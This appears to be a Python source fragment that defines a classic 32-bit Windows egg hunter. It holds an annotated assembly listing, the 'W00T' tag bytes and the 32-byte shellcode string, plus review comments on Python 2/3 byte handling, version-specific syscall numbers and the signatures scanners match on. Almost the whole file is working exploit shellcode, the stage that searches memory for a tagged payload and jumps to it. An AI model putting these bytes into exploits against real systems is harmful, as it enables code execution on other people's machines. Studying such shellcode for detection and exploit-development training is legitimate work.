# Windows (x86, 32-bit) egg hunter.  The assembly listing below is the
# disassembly of the `egghunter` byte string at the bottom of this file: the
# loop advances one page at a time, probes each page with a system call so an
# unmapped address is reported as a status code instead of faulting, and scans
# each readable page for two consecutive copies of the 4-byte `egg` tag.
#
# Review notes:
#  - This file only defines `egg` and `egghunter`; nothing here emits or
#    executes them.
#  - Both literals are plain "..." strings.  Under Python 2 these are raw byte
#    strings; under Python 3 they are text `str` objects whose code points
#    happen to be U+0000..U+00FF and are NOT bytes ("\xff" would re-encode as
#    two bytes in UTF-8).  Which interpreter is intended cannot be told from
#    this file.
#  - The system-service number pushed below (0x2) is hard-coded; NT service
#    numbers are not stable across Windows releases, so this blob is tied to
#    the versions it was written against.
#  - The fixed tag bytes and the `int 0x2e` / `cmp al,0x5` probe sequence are
#    the distinctive parts of this widely published pattern and are what
#    signature-based scanners and shellcode emulators typically key on.
# align_page:
# or dx,0xfff ; add PAGE_SIZE-1 to edx
# next_addr:
# inc edx ; increment our pointer by one
# loop_check:
# push edx ; holds our current memory location
# push 0x2 ; push NtAccessCheckAndAuditAlarm
# pop eax ; pop that into eax
# int 0x2e ; perform the syscall
# cmp al,0x5 ; check = 0xc0000005 (ACCESS_VIOLATION)
# pop edx ; restore edx
# jz align_page ; invalid ptr, go to next page
# is_egg:
# mov eax,0x57303054 ; egg goes in eax (W00T)
# mov edi,edx ; set edi to current memory location
# scasd ; compare eax/edi and increment edi 4 bytes
# jnz next_addr ; increment counter by one if no match
# scasd ; first 4 bytes matched, does other half?
# jnz next_addr ; increment counter by one if no match
# matched:
# jmp edi ; egg found! jump to our shellcode
# egg: the 4-byte tag.  In memory the bytes read "T00W"; the dword 0x57303054
# loaded into eax above is the same four bytes interpreted little-endian.
# Because the hunter executes `scasd` twice, it only stops on two back-to-back
# copies of the tag.
egg = "\x54\x30\x30\x57"
# egghunter: the 32 raw bytes encoding the listing above, in the same order.
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"